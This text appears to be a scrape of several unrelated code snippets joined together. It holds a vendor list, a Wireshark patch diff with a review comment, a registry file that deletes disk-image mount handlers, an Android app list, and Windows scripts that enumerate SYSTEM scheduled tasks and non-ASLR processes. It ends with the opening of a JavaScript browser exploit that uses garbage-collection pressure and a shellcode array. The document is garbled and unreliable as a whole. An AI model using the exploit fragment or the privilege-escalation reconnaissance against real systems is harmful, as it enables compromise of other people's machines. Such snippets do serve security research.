This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
AMPAK Technology, Inc.
ASUSTek COMPUTER INC.
AzureWave Technology Inc.
BizLink (Kunshan) Co.,Ltd
Chicony Electronics Co., Ltd.
Digital Data Communications Asia Co.,Ltd
GOOD WAY IND. CO., LTD.
HUAWEI TECHNOLOGIES CO.,LTD
Hon Hai Precision Ind. Co.,Ltd.
Intel Corporate
--- packet-tpkt.c.orig 2019-06-21 14:47:47.831026881 +0000 | |
+++ packet-tpkt.c 2019-06-21 15:05:31.115056289 +0000 | |
@@ -22,6 +22,7 @@ | |
#include <epan/show_exception.h> | |
#include "packet-tpkt.h" | |
+#include "packet-tls.h" | |
void proto_register_tpkt(void); | |
void proto_reg_handoff_tpkt(void); | |
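Review bot: the new `#include "packet-tls.h"` in the include block at the top of packet-tpkt.c makes the TPKT dissector depend on the TLS dissector's header, with no comment or patch description saying which declaration it is needed for. Add a one-line comment beside the include naming the symbol it provides, so the cross-dissector dependency can be removed if that use ever goes away.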
@@ -42,6 +43,7 @@ | |
static gboolean tpkt_desegment = TRUE; |
Windows Registry Editor Version 5.00
[-HKEY_CLASSES_ROOT\.iso]
[-HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount\command]
[-HKEY_CLASSES_ROOT\.img]
[-HKEY_CLASSES_ROOT\.vhdx]
This file has been truncated, but you can view the full file.
com.whatsapp 1000000000
com.lenovo.anyshare.gps 1000000000
com.instagram.android 1000000000
com.zhiliaoapp.musically 500000000
com.viber.voip 500000000
wp.wattpad 100000000
vStudio.Android.Camera360 100000000
vsin.t16_funny_photo 100000000
com.yahoo.mobile.client.android.mail 100000000
com.xvideostudio.videoeditor 100000000
#!/usr/bin/env python
'''
Utility to check for processes running with non-ASLR-compatible components.
Run with Administrative privileges to get visibility into all processes.
(1a) psutil: https://pypi.org/project/psutil/
Installed via PIP
-OR-
(1b) Sysinternals ListDLLs: https://docs.microsoft.com/en-us/sysinternals/downloads/listdlls
# DON'T USE THIS VERSION!
# Try https://gist.github.com/wdormann/89ed779933fe205fb52ecf3eacf5ff40 instead
import os
import subprocess
# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/
svcinfo = {}
FNULL = open(os.devnull, 'w')
# Don't use this version!
# Try https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c instead
#
# Utility for listing SYSTEM-privileged scheduled tasks on Windows
# Tasks that come with Windows 10 are not included.
# Admin privileges are required to list all scheduled tasks.
import csv
import subprocess
import tempfile
$win10_builtin = @('AppVClient', 'ClickToRunSvc', 'COMSysApp', 'diagnosticshub.standardcollector.service',
    'msiserver', 'ose', 'perceptionsimulation', 'SecurityHealthService', 'Sense',
    'SensorDataService', 'SgrmBroker', 'Spooler', 'ssh-agent', 'TieringEngineService',
    'TrustedInstaller', 'UevAgentService', 'vds', 'VSS', 'wbengine', 'WinDefend', 'wmiApSrv',
    'WSearch', 'XboxNetApiSvc', 'XboxGipSvc', 'XblGameSave', 'XblAuthManager', 'WwanSvc', 'wuauserv',
    'WwanSvc', 'wuauserv', 'WpnService', 'WPDBusEnum', 'WpcMonSvc', 'WManSvc', 'wlidsvc', 'WlanSvc',
    'wisvc', 'Winmgmt', 'WiaRpc', 'WerSvc', 'wercplsupport', 'WdiSystemHost', 'WbioSrvc', 'WalletService',
    'WaaSMedicSvc', 'vmvss', 'vmicvss', 'vmicvmsession', 'vmicshutdown', 'vmicrdv', 'vmickvpexchange',
    'vmicheartbeat', 'vmicguestinterface', 'VaultSvc', 'UsoSvc', 'UserManager', 'UmRdpService',
    'TroubleshootingSvc', 'TrkWks', 'TokenBroker', 'Themes', 'TabletInputService',
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
if (-Not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Write-Warning "We don't have elevated privileges. The following results may not be complete."
}
schtasks /query /fo csv -v | ConvertFrom-Csv | ? {$_.Status -notlike "Disabled" -and $_.TaskName -notlike "\Microsoft\Windows\*" -and $_.TaskName -notlike "\Microsoft\Office\*" -and $_.TaskName -notlike "\Microsoft\XblGameSave\*" -and $_.TaskName -notlike "TaskName" -and ($_."Run As User" -like "*system" -or $_."Run As User" -like "Administrator*")} | fl taskname,"Comment","Task To Run","Run As User"
<script>
function gc() {
    for (var i = 0; i < 0x80000; ++i) {
        var a = new ArrayBuffer();
    }
}
let shellcode = [
    // Move x18 to x28 (TEB)